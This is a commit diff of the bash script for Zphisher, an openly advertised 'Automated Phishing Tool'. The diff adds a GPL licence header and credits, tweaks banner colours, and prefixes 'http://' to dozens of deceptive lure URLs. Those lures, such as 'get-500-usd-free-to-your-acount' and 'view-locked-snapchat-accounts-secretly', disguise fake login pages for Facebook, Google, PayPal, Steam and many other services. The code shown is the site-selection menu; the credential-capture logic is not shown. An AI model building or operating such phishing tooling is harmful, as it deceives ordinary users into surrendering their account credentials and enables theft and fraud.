1
1
#! /bin/bash
2
2
3
- # # Zphisher - Automated Phishing Tool V2.1
3
+ # # Zphisher - Automated Phishing Tool
4
+ # # Version : 2.1 Beta
5
+
6
+ # # Author : TAHMID RAYAT
7
+ # # Github : https://github.com/htr-tech
8
+
9
+ # # THANKS TO :
10
+ # # Aditya Shakya - https://github.com/adi1090x
11
+
12
+ # # Moises Tapia - https://github.com/MoisesTapia
13
+ # # DarksecDevelopers - https://github.com/DarksecDevelopers
14
+ # # TheLinuxChoice
15
+
16
+ # # If you Copy Then Give the credits :)
17
+
18
+ # # GNU GENERAL PUBLIC LICENSE
19
+ # # Version 3, 29 June 2007
20
+ # #
21
+ # # Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
22
+ # # Everyone is permitted to copy and distribute verbatim copies
23
+ # # of this license document, but changing it is not allowed.
24
+ # #
25
+ # # Preamble
26
+ # #
27
+ # # The GNU General Public License is a free, copyleft license for
28
+ # # software and other kinds of works.
29
+ # #
30
+ # # The licenses for most software and other practical works are designed
31
+ # # to take away your freedom to share and change the works. By contrast,
32
+ # # the GNU General Public License is intended to guarantee your freedom to
33
+ # # share and change all versions of a program--to make sure it remains free
34
+ # # software for all its users. We, the Free Software Foundation, use the
35
+ # # GNU General Public License for most of our software; it applies also to
36
+ # # any other work released this way by its authors. You can apply it to
37
+ # # your programs, too.
38
+ # #
39
+ # # When we speak of free software, we are referring to freedom, not
40
+ # # price. Our General Public Licenses are designed to make sure that you
41
+ # # have the freedom to distribute copies of free software (and charge for
42
+ # # them if you wish), that you receive source code or can get it if you
43
+ # # want it, that you can change the software or use pieces of it in new
44
+ # # free programs, and that you know you can do these things.
45
+ # #
46
+ # # To protect your rights, we need to prevent others from denying you
47
+ # # these rights or asking you to surrender the rights. Therefore, you have
48
+ # # certain responsibilities if you distribute copies of the software, or if
49
+ # # you modify it: responsibilities to respect the freedom of others.
50
+ # #
51
+ # # For example, if you distribute copies of such a program, whether
52
+ # # gratis or for a fee, you must pass on to the recipients the same
53
+ # # freedoms that you received. You must make sure that they, too, receive
54
+ # # or can get the source code. And you must show them these terms so they
55
+ # # know their rights.
56
+ # #
57
+ # # Developers that use the GNU GPL protect your rights with two steps:
58
+ # # (1) assert copyright on the software, and (2) offer you this License
59
+ # # giving you legal permission to copy, distribute and/or modify it.
60
+ # #
61
+ # # For the developers' and authors' protection, the GPL clearly explains
62
+ # # that there is no warranty for this free software. For both users' and
63
+ # # authors' sake, the GPL requires that modified versions be marked as
64
+ # # changed, so that their problems will not be attributed erroneously to
65
+ # # authors of previous versions.
66
+ # #
67
+ # # Some devices are designed to deny users access to install or run
68
+ # # modified versions of the software inside them, although the manufacturer
69
+ # # can do so. This is fundamentally incompatible with the aim of
70
+ # # protecting users' freedom to change the software. The systematic
71
+ # # pattern of such abuse occurs in the area of products for individuals to
72
+ # # use, which is precisely where it is most unacceptable. Therefore, we
73
+ # # have designed this version of the GPL to prohibit the practice for those
74
+ # # products. If such problems arise substantially in other domains, we
75
+ # # stand ready to extend this provision to those domains in future versions
76
+ # # of the GPL, as needed to protect the freedom of users.
77
+ # #
78
+ # # Finally, every program is threatened constantly by software patents.
79
+ # # States should not allow patents to restrict development and use of
80
+ # # software on general-purpose computers, but in those that do, we wish to
81
+ # # avoid the special danger that patents applied to a free program could
82
+ # # make it effectively proprietary. To prevent this, the GPL assures that
83
+ # # patents cannot be used to render the program non-free.
84
+ # #
85
+ # # The precise terms and conditions for copying, distribution and
86
+ # # modification follow.
87
+ # #
88
+ # #
89
+ # # How to Apply These Terms to Your New Programs
90
+ # #
91
+ # # If you develop a new program, and you want it to be of the greatest
92
+ # # possible use to the public, the best way to achieve this is to make it
93
+ # # free software which everyone can redistribute and change under these terms.
94
+ # #
95
+ # # To do so, attach the following notices to the program. It is safest
96
+ # # to attach them to the start of each source file to most effectively
97
+ # # state the exclusion of warranty; and each file should have at least
98
+ # # the "copyright" line and a pointer to where the full notice is found.
99
+ # #
100
+ # # <one line to give the program's name and a brief idea of what it does.>
101
+ # # Copyright (C) 2021 HTR-TECH (https://github.com/htr-tech)
102
+ # #
103
+ # # This program is free software: you can redistribute it and/or modify
104
+ # # it under the terms of the GNU General Public License as published by
105
+ # # the Free Software Foundation, either version 3 of the License, or
106
+ # # (at your option) any later version.
107
+ # #
108
+ # # This program is distributed in the hope that it will be useful,
109
+ # # but WITHOUT ANY WARRANTY; without even the implied warranty of
110
+ # # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
111
+ # # GNU General Public License for more details.
112
+ # #
113
+ # # You should have received a copy of the GNU General Public License
114
+ # # along with this program. If not, see <https://www.gnu.org/licenses/>.
115
+ # #
116
+ # # Also add information on how to contact you by electronic and paper mail.
117
+ # #
118
+ # # If the program does terminal interaction, make it output a short
119
+ # # notice like this when it starts in an interactive mode:
120
+ # #
121
+ # # ZPHISHER Copyright (C) 2021 HTR-TECH (https://github.com/htr-tech)
122
+ # # This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
123
+ # # This is free software, and you are welcome to redistribute it
124
+ # # under certain conditions; type `show c' for details.
125
+ # #
126
+ # # The hypothetical commands `show w' and `show c' should show the appropriate
127
+ # # parts of the General Public License. Of course, your program's commands
128
+ # # might be different; for a GUI interface, you would use an "about box".
129
+ # #
130
+ # # You should also get your employer (if you work as a programmer) or school,
131
+ # # if any, to sign a "copyright disclaimer" for the program, if necessary.
132
+ # # For more information on this, and how to apply and follow the GNU GPL, see
133
+ # # <https://www.gnu.org/licenses/>.
134
+ # #
135
+ # # The GNU General Public License does not permit incorporating your program
136
+ # # into proprietary programs. If your program is a subroutine library, you
137
+ # # may consider it more useful to permit linking proprietary applications with
138
+ # # the library. If this is what you want to do, use the GNU Lesser General
139
+ # # Public License instead of this License. But first, please read
140
+ # # <https://www.gnu.org/licenses/why-not-lgpl.html>.
141
+ # #
142
+
4
143
5
144
# # ANSI colors (FG & BG)
6
145
RED=" $( printf ' \033[31m' ) " GREEN=" $( printf ' \033[32m' ) " ORANGE=" $( printf ' \033[33m' ) " BLUE=" $( printf ' \033[34m' ) "
@@ -54,6 +193,7 @@ kill_pid() {
54
193
# # Banner
55
194
banner () {
56
195
cat << - EOF
196
+ ${ORANGE}
57
197
${ORANGE} ______ _ _ _
58
198
${ORANGE} |___ / | | (_) | |
59
199
${ORANGE} / / _ __ | |__ _ ___| |__ ___ _ __
@@ -63,13 +203,14 @@ banner() {
63
203
${ORANGE} | |
64
204
${ORANGE} |_| ${RED} Version : 2.1
65
205
66
- ${GREEN} [${WHITE} *${GREEN} ]${MAGENTA } Tool Created by htr-tech (tahmid.rayat)${WHITE}
206
+ ${GREEN} [${WHITE} *${GREEN} ]${CYAN } Tool Created by htr-tech (tahmid.rayat)${WHITE}
67
207
EOF
68
208
}
69
209
70
210
# # Small Banner
71
211
banner_small () {
72
212
cat << - EOF
213
+ ${BLUE}
73
214
${BLUE} ░▀▀█░█▀█░█░█░▀█▀░█▀▀░█░█░█▀▀░█▀▄
74
215
${BLUE} ░▄▀░░█▀▀░█▀█░░█░░▀▀█░█▀█░█▀▀░█▀▄
75
216
${BLUE} ░▀▀▀░▀░░░▀░▀░▀▀▀░▀▀▀░▀░▀░▀▀▀░▀░▀${WHITE}
@@ -309,19 +450,19 @@ site_facebook() {
309
450
310
451
if [[ " $REPLY " == 1 || " $REPLY " == 01 ]]; then
311
452
website=" facebook"
312
- mask=' blue-verified-badge-for-facebook-free'
453
+ mask=' http:// blue-verified-badge-for-facebook-free'
313
454
tunnel_menu
314
455
elif [[ " $REPLY " == 2 || " $REPLY " == 02 ]]; then
315
456
website=" fb_advanced"
316
- mask=' vote-for-the-best-social-media'
457
+ mask=' http:// vote-for-the-best-social-media'
317
458
tunnel_menu
318
459
elif [[ " $REPLY " == 3 || " $REPLY " == 03 ]]; then
319
460
website=" fb_security"
320
- mask=' make-your-facebook-secured-and-free-from-hackers'
461
+ mask=' http:// make-your-facebook-secured-and-free-from-hackers'
321
462
tunnel_menu
322
463
elif [[ " $REPLY " == 4 || " $REPLY " == 04 ]]; then
323
464
website=" fb_messenger"
324
- mask=' get-messenger-premium-features-free'
465
+ mask=' http:// get-messenger-premium-features-free'
325
466
tunnel_menu
326
467
else
327
468
echo -ne " \n${RED} [${WHITE} !${RED} ]${RED} Invalid Option, Try Again..."
@@ -343,15 +484,15 @@ site_instagram() {
343
484
344
485
if [[ " $REPLY " == 1 || " $REPLY " == 01 ]]; then
345
486
website=" instagram"
346
- mask=' get-unlimited-followers-for-instagram'
487
+ mask=' http:// get-unlimited-followers-for-instagram'
347
488
tunnel_menu
348
489
elif [[ " $REPLY " == 2 || " $REPLY " == 02 ]]; then
349
490
website=" ig_followers"
350
- mask=' get-unlimited-followers-for-instagram'
491
+ mask=' http:// get-unlimited-followers-for-instagram'
351
492
tunnel_menu
352
493
elif [[ " $REPLY " == 3 || " $REPLY " == 03 ]]; then
353
494
website=" ig_verify"
354
- mask=' blue-badge-verify-for-instagram-free'
495
+ mask=' http:// blue-badge-verify-for-instagram-free'
355
496
tunnel_menu
356
497
else
357
498
echo -ne " \n${RED} [${WHITE} !${RED} ]${RED} Invalid Option, Try Again..."
@@ -373,15 +514,15 @@ site_gmail() {
373
514
374
515
if [[ " $REPLY " == 1 || " $REPLY " == 01 ]]; then
375
516
website=" google"
376
- mask=' get-unlimited-google-drive-free'
517
+ mask=' http:// get-unlimited-google-drive-free'
377
518
tunnel_menu
378
519
elif [[ " $REPLY " == 2 || " $REPLY " == 02 ]]; then
379
520
website=" google_new"
380
- mask=' get-unlimited-google-drive-free'
521
+ mask=' http:// get-unlimited-google-drive-free'
381
522
tunnel_menu
382
523
elif [[ " $REPLY " == 3 || " $REPLY " == 03 ]]; then
383
524
website=" google_poll"
384
- mask=' vote-for-the-best-social-media'
525
+ mask=' http:// vote-for-the-best-social-media'
385
526
tunnel_menu
386
527
else
387
528
echo -ne " \n${RED} [${WHITE} !${RED} ]${RED} Invalid Option, Try Again..."
@@ -402,11 +543,11 @@ site_vk() {
402
543
403
544
if [[ " $REPLY " == 1 || " $REPLY " == 01 ]]; then
404
545
website=" vk"
405
- mask=' vk-premium-real-method-2020'
546
+ mask=' http:// vk-premium-real-method-2020'
406
547
tunnel_menu
407
548
elif [[ " $REPLY " == 2 || " $REPLY " == 02 ]]; then
408
549
website=" vk_poll"
409
- mask=' vote-for-the-best-social-media'
550
+ mask=' http:// vote-for-the-best-social-media'
410
551
tunnel_menu
411
552
else
412
553
echo -ne " \n${RED} [${WHITE} !${RED} ]${RED} Invalid Option, Try Again..."
@@ -445,109 +586,109 @@ main_menu() {
445
586
site_gmail
446
587
elif [[ " $REPLY " == 4 || " $REPLY " == 04 ]]; then
447
588
website=" microsoft"
448
- mask=' unlimited-onedrive-space-for-free'
589
+ mask=' http:// unlimited-onedrive-space-for-free'
449
590
tunnel_menu
450
591
elif [[ " $REPLY " == 5 || " $REPLY " == 05 ]]; then
451
592
website=" netflix"
452
- mask=' upgrade-your-netflix-plan-free'
593
+ mask=' http:// upgrade-your-netflix-plan-free'
453
594
tunnel_menu
454
595
elif [[ " $REPLY " == 6 || " $REPLY " == 06 ]]; then
455
596
website=" paypal"
456
- mask=' get-500-usd-free-to-your-acount'
597
+ mask=' http:// get-500-usd-free-to-your-acount'
457
598
tunnel_menu
458
599
elif [[ " $REPLY " == 7 || " $REPLY " == 07 ]]; then
459
600
website=" steam"
460
- mask=' steam-500-usd-gift-card-free'
601
+ mask=' http:// steam-500-usd-gift-card-free'
461
602
tunnel_menu
462
603
elif [[ " $REPLY " == 8 || " $REPLY " == 08 ]]; then
463
604
website=" twitter"
464
- mask=' get-blue-badge-on-twitter-free'
605
+ mask=' http:// get-blue-badge-on-twitter-free'
465
606
tunnel_menu
466
607
elif [[ " $REPLY " == 9 || " $REPLY " == 09 ]]; then
467
608
website=" playstation"
468
- mask=' playstation-500-usd-gift-card-free'
609
+ mask=' http:// playstation-500-usd-gift-card-free'
469
610
tunnel_menu
470
611
elif [[ " $REPLY " == 10 ]]; then
471
612
website=" github"
472
- mask=' get-github-pro-features-free-lifetime'
613
+ mask=' http:// get-github-pro-features-free-lifetime'
473
614
tunnel_menu
474
615
elif [[ " $REPLY " == 11 ]]; then
475
616
website=" twitch"
476
- mask=' unlimited-twitch-tv-user-for-free'
617
+ mask=' http:// unlimited-twitch-tv-user-for-free'
477
618
tunnel_menu
478
619
elif [[ " $REPLY " == 12 ]]; then
479
620
website=" pinterest"
480
- mask=' get-a-premium-plan-for-pinterest-free'
621
+ mask=' http:// get-a-premium-plan-for-pinterest-free'
481
622
tunnel_menu
482
623
elif [[ " $REPLY " == 13 ]]; then
483
624
website=" snapchat"
484
- mask=' view-locked-snapchat-accounts-secretly'
625
+ mask=' http:// view-locked-snapchat-accounts-secretly'
485
626
tunnel_menu
486
627
elif [[ " $REPLY " == 14 ]]; then
487
628
website=" linkedin"
488
- mask=' get-a-premium-plan-for-linkedin-free'
629
+ mask=' http:// get-a-premium-plan-for-linkedin-free'
489
630
tunnel_menu
490
631
elif [[ " $REPLY " == 15 ]]; then
491
632
website=" ebay"
492
- mask=' get-500-usd-free-to-your-acount'
633
+ mask=' http:// get-500-usd-free-to-your-acount'
493
634
tunnel_menu
494
635
elif [[ " $REPLY " == 16 ]]; then
495
636
website=" dropbox"
496
- mask=' get-500-gb-free-to-your-acount'
637
+ mask=' http:// get-500-gb-free-to-your-acount'
497
638
tunnel_menu
498
639
elif [[ " $REPLY " == 17 ]]; then
499
640
website=" protonmail"
500
- mask=' protonmail-pro-basics-for-free'
641
+ mask=' http:// protonmail-pro-basics-for-free'
501
642
tunnel_menu
502
643
elif [[ " $REPLY " == 18 ]]; then
503
644
website=" spotify"
504
- mask=' convert-your-account-to-spotify-premium'
645
+ mask=' http:// convert-your-account-to-spotify-premium'
505
646
tunnel_menu
506
647
elif [[ " $REPLY " == 19 ]]; then
507
648
website=" reddit"
508
- mask=' reddit-official-verified-member-badge'
649
+ mask=' http:// reddit-official-verified-member-badge'
509
650
tunnel_menu
510
651
elif [[ " $REPLY " == 20 ]]; then
511
652
website=" adobe"
512
- mask=' get-adobe-lifetime-pro-membership-free'
653
+ mask=' http:// get-adobe-lifetime-pro-membership-free'
513
654
tunnel_menu
514
655
elif [[ " $REPLY " == 21 ]]; then
515
656
website=" deviantart"
516
- mask=' get-500-usd-free-to-your-acount'
657
+ mask=' http:// get-500-usd-free-to-your-acount'
517
658
tunnel_menu
518
659
elif [[ " $REPLY " == 22 ]]; then
519
660
website=" badoo"
520
- mask=' get-500-usd-free-to-your-acount'
661
+ mask=' http:// get-500-usd-free-to-your-acount'
521
662
tunnel_menu
522
663
elif [[ " $REPLY " == 23 ]]; then
523
664
website=" origin"
524
- mask=' get-500-usd-free-to-your-acount'
665
+ mask=' http:// get-500-usd-free-to-your-acount'
525
666
tunnel_menu
526
667
elif [[ " $REPLY " == 24 ]]; then
527
668
website=" cryptocoinsniper"
528
- mask=' get-500-btc-free-to-your-acount'
669
+ mask=' http:// get-500-btc-free-to-your-acount'
529
670
tunnel_menu
530
671
elif [[ " $REPLY " == 25 ]]; then
531
672
website=" yahoo"
532
- mask=' grab-mail-from-anyother-yahoo-account-free'
673
+ mask=' http:// grab-mail-from-anyother-yahoo-account-free'
533
674
tunnel_menu
534
675
elif [[ " $REPLY " == 26 ]]; then
535
676
website=" wordpress"
536
- mask=' unlimited-wordpress-traffic-free'
677
+ mask=' http:// unlimited-wordpress-traffic-free'
537
678
tunnel_menu
538
679
elif [[ " $REPLY " == 27 ]]; then
539
680
website=" yandex"
540
- mask=' grab-mail-from-anyother-yandex-account-free'
681
+ mask=' http:// grab-mail-from-anyother-yandex-account-free'
541
682
tunnel_menu
542
683
elif [[ " $REPLY " == 28 ]]; then
543
684
website=" stackoverflow"
544
- mask=' get-stackoverflow-lifetime-pro-membership-free'
685
+ mask=' http:// get-stackoverflow-lifetime-pro-membership-free'
545
686
tunnel_menu
546
687
elif [[ " $REPLY " == 29 ]]; then
547
688
site_vk
548
689
elif [[ " $REPLY " == 30 ]]; then
549
690
website=" xbox"
550
- mask=' get-500-usd-free-to-your-acount'
691
+ mask=' http:// get-500-usd-free-to-your-acount'
551
692
tunnel_menu
552
693
elif [[ " $REPLY " == 99 ]]; then
553
694
about
0 commit comments